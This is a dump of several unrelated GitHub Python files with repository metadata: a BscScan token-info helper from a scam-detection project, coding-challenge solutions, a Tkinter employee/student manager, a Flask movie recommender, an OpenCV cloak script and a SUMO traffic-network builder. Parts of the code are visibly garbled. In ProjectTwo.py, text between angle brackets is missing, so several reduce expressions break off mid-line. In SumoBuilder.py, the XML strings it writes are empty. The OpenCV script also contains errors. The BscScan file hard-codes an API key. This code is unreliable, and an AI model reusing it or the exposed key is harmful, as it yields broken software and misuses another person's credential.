crawl\n\nBSC_KEY = 'EV41IX58376FTWQM37PW9T3ADJV18HSPZN'\n\n# get total supply of token by ContractAddress\ndef get_total_supply(contract_address: str):\n url = 'https://api.bscscan.com/api?module=stats&action=tokensupply&contractaddress=' +\\\n contract_address + '&apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n try:\n rs = int(data)\n except ValueError:\n rs = 0\n return rs\n\n# get total circulating supply \n# -> the numbers of cryptocurrencies coins publicly available in the market\ndef get_total_circulating_supply(contract_address: str):\n url = 'https://api.bscscan.com/api?module=stats&\\\n action=tokenCsupply&contractaddress=' +\\\n contract_address + '&apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n return int(data)\n\n\n# get token account balance from token address & account address\ndef get_account_balance(token_address: str, account_address: str):\n url = 'https://api.bscscan.com/api?module=account&action=tokenbalance' +\\\n '&contractaddress=' + token_address + '&address=' + account_address +\\\n '&tag=latest&apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n return int(data)\n\n\n# get a list of normal transaction by address\n# contain timestamp, [blocknumber, hash, nonce, blockHash, transactionindex]\n# from - to - value - gas - gas price - isError\n# contractAddress - cumulativeGasUsed\n\ndef get_list_transactions(address: str):\n url = 'https://api.bscscan.com/api?module=account&action=txlist&address=' +\\\n address + '&startblock=0&endblock=99999999&page=1&offset=10&sort=asc&' +\\\n 'apikey=' + BSC_KEY\n \n data = requests.get(url).json()['result']\n result = []\n for transaction in data:\n time = datetime.utcfromtimestamp(int(transaction['timeStamp'])) \\\n .strftime('%Y-%m-%d %H:%M:%S')\n sender = transaction['from']\n receiver = transaction['to']\n value = int(transaction['value']) / 10**18\n result.append((time, sender, receiver, value))\n \n return result\n\n# get infor about the creator of the token\ndef get_creator_of_token(address: str):\n transaction = get_list_transactions(address)[-1]\n (time, creator, _, _) = transaction\n explain = \"Token Address: \" + address + \"\\nCreator: \" + creator + \"\\n\" +\\\n \"Time create: \"+ time \n \n return (explain, creator)\n\n# get the liquidity of the token by USD or BNB\ndef get_liquidity_of_token(token: str):\n url = 'https://api.pancakeswap.info/api/v2/tokens/' + token\n response = requests.get(url).json()\n try:\n data = response['data']\n price_USD = data['price']\n except:\n return 0\n return float(price_USD)\n\n# get contract abi if the contract is verified\ndef get_contract_abi(token_address: str):\n url = 'https://api.bscscan.com/api?module=contract&action=getabi' \\\n + '&address=%s&apikey=%s' % (token_address, BSC_KEY)\n response = requests.get(url=url).json()\n if response['status'] == '0':\n return None\n return response['result']\n\n# call this function for more infomation about the BSC token\ndef get_more_info_from_bsc(token_address: str):\n total_supply = get_total_supply(token_address)\n circulating_supply = get_total_circulating_supply(token_address)\n liquidity = get_liquidity_of_token(token_address)\n\n contract_abi = get_contract_abi(token_address)\n if contract_abi is None:\n token_owner = None\n else:\n token_owner = moralis.call_contract_function(\n token_address, 'owner', contract_abi, 1)\n if token_owner is None:\n token_owner = moralis.call_contract_function(\n token_address, 'getOwner', contract_abi, 1)\n if token_owner is None:\n token_owner = crawl.get_owner_of_token(token_address)\n\n return (total_supply, circulating_supply, liquidity, token_owner, contract_abi)\n {\n \"total_supply\": total_supply,\n \"circulating_supply\": circulating_supply,\n \"liquidity\": liquidity,\n \"owner\": token_owner,\n \"contract_abi\": contract_abi\n } \n\n","repo_name":"auditrate-tech/detect-scam","sub_path":"get_info_api/metadata_bsc.py","file_name":"metadata_bsc.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36108546516","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the arrayManipulation function below.\ndef arrayManipulation(n, queries):\n \n arr=n*[0]\n print(arr[n-1])\n max=0\n currentSum=0\n for i in range(0,len(queries),1):\n #print(queries[i][0]-1, end=\" \")\n #print(queries[i][1]-1, end=\" \")\n #print(queries[i][2])\n arr[queries[i][0]-1] += queries[i][2] \n if queries[i][1]+1 <= n:\n arr[queries[i][1]] -= queries[i][2] \n \n print(arr) \n for i in range(0,n,1):\n currentSum+=arr[i]\n #print(currentSum, end=\" \")\n #print(max)\n if max < currentSum:\n max=currentSum\n #print(dict)\n #key_max = max(dict.keys(), key=(lambda k: dict[k]))\n #key_min = min(my_dict.keys(), key=(lambda k: my_dict[k]))\n\n return max\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nm = input().split()\n\n n = int(nm[0])\n\n m = int(nm[1])\n\n queries = []\n\n for _ in range(m):\n queries.append(list(map(int, input().rstrip().split())))\n\n result = arrayManipulation(n, queries)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"gokadroid/Python3Examples","sub_path":"findMaxSumFromSets.py","file_name":"findMaxSumFromSets.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35033262186","text":"'''\nGiven the root of a binary tree, return the length of the diameter of the tree.\n\nThe diameter of a binary tree is the length of the longest path between any two\nnodes in a tree. This path may or may not pass through the root.\n\nThe length of a path between two nodes is represented by the number of edges\nbetween them.\n\nConstraints:\nThe number of nodes in the tree is in the range [1, 10^4].\n-100 <= Node.val <= 100\n'''\nfrom typing import Optional\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n # Watched the Youtube video - https://www.youtube.com/watch?v=bkxqA8Rfv04\n # The diameter of a node in a tree = height of left subtree + height of right subtree + 2\n # Time O(n) Space O(h)\n def diameterOfBinaryTree2(self, root: Optional[TreeNode]) -> int:\n res = 0 # res = [0]\n def dfs(root):\n if not root:\n return -1\n left = dfs(root.left)\n right = dfs(root.right)\n nonlocal res # no need if claim res = [0] at first (but may be not a good practice)\n res = max(res, 2+left+right) # res[0] = max(res[0], 2+left+right)\n return 1 + max(left, right)\n dfs(root)\n return res # return res[0]\n\n def diameterOfBinaryTree3(self, root: Optional[TreeNode]) -> int:\n self.diameter = 0 # This works like a \"global\" variable (but not a good practice)\n\n def height(node):\n if not node: return -1\n left, right = height(node.left), height(node.right)\n self.diameter = max(self.diameter, 2+left+right)\n return 1 + max(left, right)\n\n height(root)\n return self.diameter\n\n # The diameter is the maximum of either:\n # Passing through the root (in which case the longest path would be using the maximum depth of left and right child)\n # The diameter of the left child\n # The diameter of the right child\n def diameterOfBinaryTree(self, root):\n return self.diameter_rec(root)[0]\n\n def diameter_rec(self, root):\n if not root:\n return 0, -1\n\n left_diameter, left_height = self.diameter_rec(root.left)\n right_diameter, right_height = self.diameter_rec(root.right)\n return (max(left_diameter, right_diameter, left_height + right_height + 2), max(left_height, right_height) + 1)\n\ndef evaluate(function, tests):\n for test in tests:\n actual = function(**test['Input'])\n expect = test['Output']\n print('Actual output:', actual)\n print('Expected output:', expect)\n print('Passed?', actual == expect)\n print('\\n')\n\ndef listToTree(level_order: list) -> TreeNode:\n values = iter(level_order)\n root = TreeNode(next(values))\n nodes_to_fill = [root]\n try:\n while True:\n next_node = nodes_to_fill.pop(0)\n new_left = next(values)\n if new_left is not None:\n next_node.left = TreeNode(new_left)\n nodes_to_fill.append(next_node.left)\n new_right = next(values)\n if new_right is not None:\n next_node.right = TreeNode(new_right)\n nodes_to_fill.append(next_node.right)\n except StopIteration:\n return root\n\ntest0 = {'Input':\n {'root': listToTree([1,2,3,4,5])\n },\n 'Output': 3\n }\n\ntest1 = {'Input':\n {'root': listToTree([1,2])\n },\n 'Output': 1\n }\n\ntest2 = {'Input':\n {'root': listToTree([2, 3, None, 1])\n },\n 'Output': 2\n }\n\ntest3 = {'Input':\n {'root': listToTree([3,5,None,6,7,None,None,4,None,None,8])\n },\n 'Output': 4\n }\n\ntests = [test0, test1, test2, test3]\n\ndef main():\n solution = Solution()\n evaluate(solution.diameterOfBinaryTree, tests)\n\nif __name__ == '__main__':\n main()\n","repo_name":"zgwillustc/LeetCode","sub_path":"543-Diameter of Binary Tree/DiameterofBinaryTree.py","file_name":"DiameterofBinaryTree.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73747777121","text":"from functools import reduce\nimport tkinter.scrolledtext as ScrolledText\nfrom tkinter import *\nimport json\n\n# =============================================================================\n# Person Class\n# =============================================================================\nclass Person:\n def __init__(self,name,address):\n self._name =name\n self._address =address\n \n def get_name(self):\n return self._name\n \n def set_name(self , new_name):\n self._name = new_name\n \n def get_address(self):\n return self._address\n \n def set_address(self,new_address):\n self._address = new_address\n \n def __del__(self):\n print(\"I have been deleted\")\n\n# =============================================================================\n# Employee Class\n# =============================================================================\nclass Employee(Person):\n def __init__(self, employee_number, name, address, salary, job_title, loan):\n super().__init__(name, address)\n self.employee_number = int(employee_number)\n self.__salary = float(salary)\n self.__job_title = str(job_title)\n self.__loan = list(loan)\n \n def get_salary(self):\n return self.__salary\n \n def set_salary(self, changed_salary):\n self.__salary = changed_salary\n \n def get_job_title(self):\n return self.__job_title\n \n def set_job_title(self, changed_job_title):\n self.__job_title = changed_job_title\n \n def get_total_loans(self):\n if len(self.__loan) !=0: \n summation = reduce(lambda acc , loan : acc + loan , self.__loan)\n return summation\n \n def get_max_loan(self):\n if len(self.__loan) !=0: \n max_loan = reduce(lambda max_loan , current_loan : max_loan if max_loan > current_loan else current_loan ,self.__loan )\n return max_loan\n return 0\n \n \n def get_min_laon(self):\n if len(self.__loan) !=0: \n min_loan = reduce(lambda min_loan , current_loan : min_loan if min_loan < current_loan else current_loan ,self.__loan )\n return min_loan\n return 0\n \n def set_loans(self,changed_loans):\n self.__loan = changed_loans\n \n \n def get_loans(self):\n return self.__loan\n \n def print_info(self):\n print(\"Employee Information :-\\n\" + \"Name : \" + self._name, \"\\nAddress : \" + self._address, \"\\nEmployee Number : \"+str(self.employee_number), \"\\nSalary : \"+ str(self.__salary), \"\\nJop Title : \" +self.__job_title,\"\\nTotal Loans : \" +str(self.get_total_loans()) , end=\"\\n\")\n \n \n def __del__(self):\n print('I have been deleted')\n\n# =============================================================================\n# Student Class\n# =============================================================================\nclass Student(Person): \n def __init__(self, student_number,name,address, subject, marks):\n super().__init__(name,address)\n self.student_number = int(student_number)\n self.__subject = str(subject)\n self.__marks = dict(marks)\n \n def get_subject(self):\n return self.__subject\n \n def set_subject(self, changed_subject):\n self.__subject = changed_subject\n \n def get_marks(self):\n return self.__marks\n \n def set_marks(self, change_marks):\n self.__marks = change_marks\n \n def get_average(self):\n avg = reduce(lambda acc, mark: acc + mark,self.__marks.values()) / len(self.__marks)\n return avg\n \n def get_list_grade_marks(self):\n list_grades = {}\n for key,value in self.__marks.items():\n if value >= 90:\n list_grades.update({key:value})\n return list_grades\n \n def print_info(self):\n print(\"Student Information :-\", \"\\nStudent Number : \", self.student_number, \"\\nName : \", self._name, \"\\nAddress : \", self._address, \"\\nSubject : \", self.__subject, \"\\nAverage\", self.get_average(), \"\\nMarks : \", str(self.__marks));\n \n def __del__(self):\n print(\"I have been deleted\")\n \n# =============================================================================\n# Extr Methods\n# =============================================================================\ndef total_objects_method(objects_list , message):\n print(message , len(objects_list))\n \ndef maximium_loan(objects_list):\n return reduce(lambda acc , employee : employee if employee.get_max_loan() > acc.get_max_loan() else acc,objects_list)\n \ndef minimum_loan(objects_list):\n return reduce(lambda acc ,loan : acc if acc.get_min_laon()==0 or loan.get_min_laon()==0 else loan if loan.get_min_laon()nested_loan else nested_loan,loan)\n if(acc >nested_reduce):\n return acc\n else:\n return nested_reduce\n \n \n \n highest_loan = reduce(reduce_employee, employee_list.values(),0)\n return highest_loan;\n \n\ndef lowerst_loans_by_dictionary(employee_list):\n \n def reduce_employee(acc , loan):\n nested_reduce =reduce(lambda nested_acc , nested_loan:nested_acc if nested_accmax_salary:\n max_salary = employee.get_salary()\n return max_salary\n\ndef lowest_salary(employee_list):\n min_salary = 1000000000000000;\n for employee in employee_list:\n if employee.get_salary() acc.get_average() else acc, students_list) \nprint(\"------------------------------------------\")\nprint(\"The Student INFO That have highst AVG :\")\nhighst_average.print_info()\n\n\n#=================================== 17 ====================================#\nprint(\"-------------------------17------------------------\")\nremove_objects(employee_list)\nremove_objects(students_list)\n\n\n\n\nroot = Tk()\nroot.title('Desktop App')\nroot.geometry('500x300+710+390')\n\ndef messageBox():\n messagebox.showinfo('HELP','OOP Second Project' )\n \n\ndef employee():\n def subAddEmp():\n Loans = [int(i) for i in lon.get().split(\",\")]\n tempEmp = Employee( int(num.get()) ,names.get(),addr.get(),float(saly.get()),job.get(), Loans)\n employee_list.append(tempEmp)\n print(len(employee_list))\n\n c = Toplevel(root)\n c.geometry(\"300x250+810+415\")\n number = Label(c, text=\"Employee Number\").place(x=10, y=10)\n name = Label(c, text=\"Employee Name\").place(x=10, y=40)\n address = Label(c, text=\"Address\").place(x=10, y=70)\n salary = Label(c, text=\"Salary\").place(x=10, y=100)\n jobTitle = Label(c, text=\"Job Title\").place(x=10, y=130)\n loan = Label(c, text=\"Loan\").place(x=10, y=160)\n add = Button(c,text=\"Add\",command=subAddEmp).place(x=10, y=190)\n\n num = StringVar()\n employee_number= Entry(c, textvariable = num).place(x = 120, y= 10)\n names = StringVar()\n name = Entry(c, textvariable = names).place(x = 120, y= 40)\n addr = StringVar()\n address= Entry(c, textvariable = addr).place(x = 120, y= 70)\n saly = StringVar()\n salary = Entry(c, textvariable = saly).place(x = 120, y= 100)\n job = StringVar()\n job_title= Entry(c, textvariable = job).place(x = 120, y= 130)\n lon = StringVar()\n loan = Entry(c, textvariable = lon).place(x = 120, y= 160)\n exitform = Button(c,text=\"Exit\",command=c.destroy).place(x=120, y=190)\n\n\ndef student():\n def subAddStu():\n print(len (students_list))\n allMarks =json.loads(mark.get())\n tempStu = Student(int(num.get()), names.get(), addr.get(), sub.get(), allMarks)\n students_list.append(tempStu)\n print(len(students_list))\n\n\n c = Toplevel(root)\n c.geometry(\"300x250+810+415\")\n number = Label(c, text=\"Student Number\").place(x=10, y=10)\n name = Label(c, text=\"Student Name\").place(x=10, y=40)\n address = Label(c, text=\"Address\").place(x=10, y=70)\n subject = Label(c, text=\"Subject\").place(x=10, y=100)\n marks = Label(c, text=\"Marks\").place(x=10, y=130)\n add = Button(c,text=\"Add\",command=subAddStu).place(x=10, y=160)\n\n num = StringVar() \n student_number= Entry(c, textvariable = num).place(x = 120, y= 10)\n names = StringVar()\n name = Entry(c,textvariable = names).place(x = 120, y= 40)\n addr = StringVar()\n address= Entry(c, textvariable = addr).place(x = 120, y= 70)\n sub = StringVar()\n subject = Entry(c, textvariable = sub).place(x = 120, y= 100)\n mark = StringVar()\n marks= Entry(c, textvariable = mark).place(x = 120, y= 130)\n exitform = Button(c,text=\"Exit\",command=c.destroy).place(x=120, y=160) \n\n\ndef viewStudent():\n viewchild = Toplevel(root)\n st = ScrolledText.ScrolledText(viewchild)\n st.pack()\n \n\n for i,v in enumerate(students_list):\n st.insert(INSERT, \"Student \"+str(i+1)+\"\\n\" +\"Student Number \"+ str(v.student_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address()+\" AVG \"+str(v.get_average()) +\"\\n\")\n st.insert(INSERT, \"Marks : \\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for key,value in v.get_list_grade_marks().items():\n st.insert(INSERT, str(key)+\" \" + str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n\n\n \ndef viewEmployee():\n viewchild = Toplevel(root)\n st = ScrolledText.ScrolledText(viewchild)\n st.pack()\n \n\n for i,v in enumerate(employee_list):\n st.insert(INSERT, \" Employee \"+str(i+1)+\"\\n\" +\" Employee Number \"+ str(v.employee_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address() + \" Job Title \"+v.get_job_title() + \" Salary \"+str(v.get_salary()) +\" Totla Loans \" +str(v.get_total_loans())+ \" Max Loan \"+str(v.get_max_loan()) + \" Min Loan \"+str(v.get_min_laon()) +\"\\n\")\n st.insert(INSERT, \"All Loans : \\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for value in v.get_loans():\n st.insert(INSERT,str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\") \n\ndef viewdeletewindowEmployee():\n def delete():\n notfind=True\n for i,v in enumerate(employee_list):\n if(v.employee_number == int(user_number.get())):\n employee_list.pop(i)\n notfind=False\n \n if notfind:\n messagebox.showerror(\"Error\",\"Can't Find The Student\")\n \n viewchild = Toplevel(root)\n viewchild.geometry(\"200x150+800+415\")\n user_number=StringVar()\n entryID = Entry(viewchild,textvariable=user_number).place(x=20,y=20)\n btn=Button(viewchild, text=\"Delete\",command=delete).place(x=20,y=40)\n \n\n\ndef viewdeletewindowStudents():\n def delete():\n notfind=True\n for i,v in enumerate(students_list):\n if(v.student_number == int(user_number.get())):\n students_list.pop(i)\n notfind=False\n \n if notfind:\n messagebox.showerror(\"Error\",\"Can't Find The Student\")\n \n viewchild = Toplevel(root)\n viewchild.geometry(\"200x150+800+415\")\n user_number=StringVar()\n entryID = Entry(viewchild,textvariable=user_number).place(x=20,y=20)\n btn=Button(viewchild, text=\"Delete\",command=delete).place(x=20,y=40)\n \n \n\n\n \ndef report():\n viewchild = Toplevel(root)\n st = ScrolledText.ScrolledText(viewchild)\n st.pack()\n \n\n for i,v in enumerate(employee_list):\n st.insert(INSERT, \" Employee \"+str(i+1)+\"\\n\" +\" Employee Number \"+ str(v.employee_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address() + \" Job Title \"+v.get_job_title() + \" Salary \"+str(v.get_salary()) +\" Totla Loans \" +str(v.get_total_loans())+ \" Max Loan \"+str(v.get_max_loan()) + \" Min Loan \"+str(v.get_min_laon()) +\"\\n\")\n st.insert(INSERT, \"All Loans : \\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for value in v.get_loans():\n st.insert(INSERT,str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\") \n\n for i,v in enumerate(students_list):\n st.insert(INSERT, \"Student \"+str(i+1)+\"\\n\" +\"Student Number \"+ str(v.student_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address()+\" AVG \"+str(v.get_average()) +\"\\n\")\n st.insert(INSERT, \"Marks : \\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for key,value in v.get_list_grade_marks().items():\n st.insert(INSERT, str(key)+\" \" + str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n\n \n \ntop = Menu(root)\nroot.config(menu=top)\n\nfile = Menu(top, tearoff = 0)\nfile.add_command(label='Rport', command = report)\nfile.add_separator()\nfile.add_command(label='Exit', command = root.destroy)\ntop.add_cascade(label='File', menu=file)\n\nemployees = Menu(top, tearoff=0)\nemployees.add_command(label='Add', command=employee)\nemployees.add_command(label='View', command = viewEmployee)\nemployees.add_command(label='Delete', command = viewdeletewindowEmployee)\ntop.add_cascade(label = 'Employees', menu=employees)\n\n\nstudents = Menu(top, tearoff=0)\nstudents.add_command(label='Add', command=student)\nstudents.add_command(label='View', command = viewStudent)\nstudents.add_command(label='Delete', command = viewdeletewindowStudents)\ntop.add_cascade(label = 'Students', menu=students)\n\n\n_help = Menu(top, tearoff=0)\n_help.add_command(label='About', command = messageBox)\ntop.add_cascade(label = 'Help', menu=_help)\n\n\nroot.mainloop()\n\n\n\n# =============================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n# =============================================================================\n \n \n\n\n \n \n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"Bittar-95/Python","sub_path":"ProjectTwo.py","file_name":"ProjectTwo.py","file_ext":"py","file_size_in_byte":21163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73374402723","text":"from flask import Flask, render_template, request\nimport pandas as pd\nfrom modules import *\nfrom surprise import dump\n\n# Load the trained SVD model from the file\nloaded_model = dump.load('models/svd_model.pkl')\n\n# Access the loaded model\nsvd_model = loaded_model[1]\n\nmovielens=pd.read_csv('datasets/movielens.csv')\ntop30=pd.read_csv('datasets/top.csv')\ntop30 = top30.values.tolist()\nprint(top30[0])\nusers = movielens['user_id'].unique()\n\n#flask config\napp = Flask(__name__)\n\n@app.route('/', methods=['GET'])\ndef index():\n # Handle GET request\n return render_template('index.html',top=top30)\n@app.route('/genre', methods=['GET','POST'])\ndef genre():\n # Handle GET request\n if request.method=='POST':\n movie_name = request.form[\"movie\"]\n image,overview,genre=get_movie_genre(movie_name)\n return render_template('genreResult.html',movie_name=movie_name,overview=overview,genre=genre,image=image)\n return render_template('genre.html')\n\n@app.route('/sentiment', methods=['GET','POST'])\ndef sentiment():\n # Handle GET request\n if request.method=='POST':\n movie_name = request.form[\"movie\"]\n #return render_template('sentimentResult.html',movie_name=movie_name)\n image,reviews,score=getSentiment(movie_name)\n return render_template('sentimentResult.html',image=image,movie_name=movie_name,reviews=reviews,score=score)\n return render_template('sentiment.html')\n\n@app.route('/precommender',methods=['GET','POST'])\ndef precommender():\n if request.method=='POST':\n user=request.form[\"user\"]\n precommendations=get_recommendations(data=movielens,user_id=user,top_n=10,algo=svd_model)\n posters=[]\n for m in precommendations:\n im=get_image(m[0])\n posters.append(im)\n return render_template('precommenderResults.html',posters=posters,user_id=user,topFive=precommendations)\n return render_template('precommender.html',users=users)\n\n@app.route('/grecommender',methods=['GET','POST'])\ndef grecommender():\n if request.method=='POST':\n user1=request.form[\"user1\"]\n user2=request.form[\"user2\"]\n user3=request.form[\"user3\"]\n grecommendations=grouprecommendations(user1,user2,user3)\n postersg=[]\n for m in grecommendations:\n im=get_image(m)\n postersg.append(im)\n return render_template('grecommenderResults.html',posters=postersg,user1=user1,user2=user2,user3=user3,topTen=grecommendations)\n return render_template('grecommender.html',users=users)\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"Reckon77/group-movie-recommender","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40299262552","text":"import cv2\r\nimport numpy as np\r\nimport time\r\n\r\n#to save the output in avi format\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\noutput_file = cv2.VideoWriter('output.avi', fourcc, 20.0,(640,48))\r\n#to start the camera\r\ncam = cv2.VideoCapture(0)\r\n#to start the program after two seconds\r\ntime.sleep(2)\r\nbg = 0\r\n#to capture the background for 60 frames\r\nfor i in range(60):\r\n #to return the read images inside the bg var\r\n ret, bg = cam.read()\r\n#to flip the bg img\r\nbg = np.flip(bg,axis = 1)\r\n\r\n#to read the captured images until the camera is open\r\nwhile(cam.isOpened()):\r\n ret, img = cam.read()\r\n if not ret:\r\n break\r\n img = np.flip(img,axis = 1)\r\n #to convert the color of the img from bgr to hsv\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n #to generate a mask to detect red color\r\n lower_red = np.array([0,120,50])\r\n upper_red = np.array([10,255,255])\r\n mask_one = cv2.inRange(hsv,lower_red,upper_red)\r\n \r\n lower_red = np.array([170,120,70])\r\n upper_red = np.array([180,255,255])\r\n mask_two = cv2.inRange(hsv,lower_red,upper_red)\r\n \r\n mask_one=mask_one+mask_two\r\n #to open and expand the img where there is mask_one color\r\n mask_one = cv2.morphologyEx(mask_one, cv2.MORPH_OPEN, np.ones(3,3), np.uint8)\r\n mask_one = cv2.morphologyEx(mask_one, cv2.MORPH_DILATE, np.ones(3,3), np.uint8)\r\n \r\n #to select the part tat doesnot have mask one\r\n mask_two = cv2.bitwise_not(mask_one)\r\n \r\n #to save the part of the img without using red color\r\n res_one = cv2.bitwise_and(img,img,mask=mask_two)\r\n res_two = cv2.bitwise_and(bg,bg,mask=mask_two)\r\n #to generate the final output\r\n final_output = cv2.addWaited(res_one, 1, res_two, 1,0)\r\n \r\ncam.release()\r\n#out.release()\r\ncv2.destroyAllWindows()","repo_name":"PrabhudevMishra/C121","sub_path":"c121.py","file_name":"c121.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23400548049","text":"import os, sys\nimport logging\n\n# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\nclass SumoBuilder :\n\n # -----------------------------------------------------------------\n def __init__(self, settings, world, laysettings) :\n self.Logger = logging.getLogger(__name__)\n\n self.World = world\n self.LayoutSettings = laysettings\n\n self.ScaleValue = 3.0\n\n try :\n self.Path = settings[\"SumoConnector\"].get(\"SumoNetworkPath\",\".\")\n self.Prefix = settings[\"SumoConnector\"].get(\"SumoDataFilePrefix\",\"network\")\n self.ScaleValue = settings[\"SumoConnector\"].get(\"NetworkScaleFactor\",3.0)\n self.VehicleScaleValue = settings[\"SumoConnector\"].get(\"VehicleScaleFactor\",2.0)\n except NameError as detail:\n self.Logger.warn(\"Failed processing sumo configuration; name error %s\", (str(detail)))\n sys.exit(-1)\n except KeyError as detail:\n self.Logger.warn(\"unable to locate sumo configuration value for %s\", (str(detail)))\n sys.exit(-1)\n except :\n self.Logger.warn(\"SumoBuilder configuration failed; %s\", (sys.exc_info()[0]))\n sys.exit(-1)\n\n # -----------------------------------------------------------------\n def Scale(self, value) :\n return self.ScaleValue * value\n\n # -----------------------------------------------------------------\n def VehicleScale(self, value) :\n return self.VehicleScaleValue * value\n\n # -----------------------------------------------------------------\n def CreateRoads(self) :\n fname = os.path.join(self.Path,self.Prefix + '.edg.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for ename, edge in self.World.IterEdges(edgetype = 'Road') :\n sn = edge.StartNode.Name\n en = edge.EndNode.Name\n etype = edge.RoadType.Name\n cn = 'center' if edge.RoadType.Center else 'right'\n fp.write(\" \\n\" % (ename, cn, sn, en, etype))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateIntersections(self) :\n fname = os.path.join(self.Path,self.Prefix + '.nod.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for name, node in self.World.IterNodes(nodetype = 'Intersection') :\n itype = node.IntersectionType.IntersectionType\n fp.write(\" \\n\" % (name, self.Scale(node.Coord.X), self.Scale(node.Coord.Y), itype))\n\n for name, node in self.World.IterNodes(nodetype = 'EndPoint') :\n itype = node.IntersectionType.IntersectionType\n fp.write(\" \\n\" % (name, self.Scale(node.Coord.X), self.Scale(node.Coord.Y), itype))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateConnections(self) :\n fname = os.path.join(self.Path,self.Prefix + '.con.xml')\n\n fstring = \" \\n\"\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for name, node in self.World.IterNodes(nodetype = 'Intersection') :\n\n if not node.EdgeMap.Signature() == ['2L/2L', '2L/2L', '2L/2L', '2L/2L' ] :\n continue\n\n oedges = node.EdgeMap.OutputEdgeMap()\n iedges = node.EdgeMap.InputEdgeMap()\n for pos in range(4) :\n lpos = (pos + 1) % 4 # left turn\n spos = (pos + 2) % 4 # straight across\n rpos = (pos + 3) % 4 # right turn\n\n fp.write(fstring.format(iedges[pos].Name, oedges[lpos].Name, 1, 1))\n fp.write(fstring.format(iedges[pos].Name, oedges[spos].Name, 1, 1))\n fp.write(fstring.format(iedges[pos].Name, oedges[spos].Name, 0, 0))\n fp.write(fstring.format(iedges[pos].Name, oedges[rpos].Name, 0, 0))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateRoadTypes(self) :\n fname = os.path.join(self.Path,self.Prefix + '.typ.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for name, rtype in self.World.IterNodes(nodetype = 'RoadType') :\n etype = rtype.RoadType\n fp.write(\" \\n\" %\n (etype.Name, etype.Priority, etype.Lanes, self.Scale(etype.Speed), self.VehicleScale(etype.Width)))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateRoutes(self) :\n vtfmt = ' '\n\n fname = os.path.join(self.Path,self.Prefix + '.rou.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for v in self.LayoutSettings.VehicleTypes :\n vtype = self.LayoutSettings.VehicleTypes[v]\n fp.write(vtfmt.format(v, self.Scale(vtype.Acceleration), self.Scale(vtype.Deceleration),\n vtype.Sigma, self.VehicleScale(vtype.Length), self.VehicleScale(vtype.MinGap), self.Scale(vtype.MaxSpeed)) + \"\\n\")\n\n fp.write(\"\\n\")\n\n for name, node in self.World.IterNodes(nodetype = 'EndPoint') :\n name = None\n for edge in node.OutputEdges :\n for redge in edge.EndNode.OutputEdges :\n if redge.EndNode == node :\n name = node.EndPoint.DestinationName\n edges = edge.Name + \" \" + redge.Name\n fp.write(\" \\n\" % (name, edges))\n break\n\n if not name :\n self.Logger.warn('cannot find route for %s', node.Name)\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def PushNetworkToSumo(self) :\n self.CreateIntersections()\n self.CreateRoads()\n self.CreateRoadTypes()\n self.CreateRoutes()\n self.CreateConnections()\n","repo_name":"Mondego/spacetime-apps","sub_path":"python/applications/mobdat/builder/SumoBuilder.py","file_name":"SumoBuilder.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} 